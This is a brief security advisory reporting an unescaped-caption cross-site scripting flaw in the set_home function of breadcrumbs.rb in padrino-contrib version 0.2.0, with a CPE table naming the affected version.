padrino-contrib is vulnerable to cross-site scripting (XSS). The caption
parameter in the function set_home
of breadcrumbs.rb
is not escaped properly to prevent injection of malicious script through it, allowing an attacker to steal session tokens or perform unwanted actions on behalf of the user.
CPE | Name | Operator | Version |
---|---|---|---|
padrino-contrib | eq | 0.2.0 |